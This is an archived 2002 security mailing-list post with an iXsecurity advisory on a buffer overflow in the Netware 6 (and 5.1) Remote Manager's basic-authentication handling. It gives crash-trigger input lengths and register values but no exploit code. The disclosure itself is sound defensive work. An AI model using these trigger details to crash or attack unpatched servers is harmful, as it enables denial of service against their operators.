iXsecurity.20020313.nw6remotemanager.a

From: Patrik Karlsson (Patrik.Karlssonat_private)
Date: Wed Apr 03 2002 - 04:33:05 PST

Next message: the Pull: "RE: MS 3/28/02 Security Patch for IE6 - warning!"

Previous message: Cisco Systems Product Security Incident Response Team: "Cisco Security Advisory: Vulnerability in zlib library"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Replying to my own post.... We found Netware 5.1 to be vulnerable to
the same exposure today.

Regards,
Patrik Karlsson & Jonas Ländin
patrik.karlssonat_private
jonas.landinat_private


iXsecurity Security Vulnerability Report
No: iXsecurity.20020313.nw6remotemanager.a
==========================================

Vulnerability Summary
---------------------
Problem:                The Netware 6 Remote Manager, which is a
                        web-based interface for managing the
                        server, has a buffer overflow condition.

Threat:                 An attacker could cause the HTTPSTK.NLM
                        or SERVER.NLM to ABEND, or possibly execute
                        arbitrary code.

Affected Software:      Netware 6 Remote Manager.

Platform:               Netware 6 and Netware 6 SP1.

Solution:               Install the patch for Netware 6 Remote
                        manager, whenever Novell decide to publish
                        it, or disable the NLM.

Vulnerability Description
-------------------------
The Netware 6 Remote Manager listens to port 8009 by default and is
to be accessed using a SSL capable webbrowser. The NLM handling this
is the HTTPSTK.NLM. The buffer overflow condition occures when the
basic authentication fields are supplied with a long username or
password. Depending on the length of the username and/or password
supplied, there server will ABEND in either the SERVER.NLM or the
HTTPSTK.NLM. The first condition occurs when the server is trying to
free memory which has been overwritten by the username. Eg. The
server is trying to free 0x00000041, when the buffer has been
filled with 595 'A's. This abend occurs in the SERVER.NLM.
The second condition is within the HTTPSTK.NLM itself and occurs
in a CMP where the EAX register contains 0x41414141. It is triggered
by 626 characters. Supplying even more characters > 1565 the browser
will respond with document contains no data, however the server will
not ABEND. We have not dug deeper in to the conditions to see if they
are exploitable or not.


Additional Information
----------------------
Novell was contacted 20020314, however they decided not to reply.

This vulnerability was found by
Patrik Karlsson & Jonas Ländin
patrik.karlssonat_private
jonas.landinat_private

Next message: the Pull: "RE: MS 3/28/02 Security Patch for IE6 - warning!"
Previous message: Cisco Systems Product Security Incident Response Team: "Cisco Security Advisory: Vulnerability in zlib library"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Apr 03 2002 - 17:13:39 PST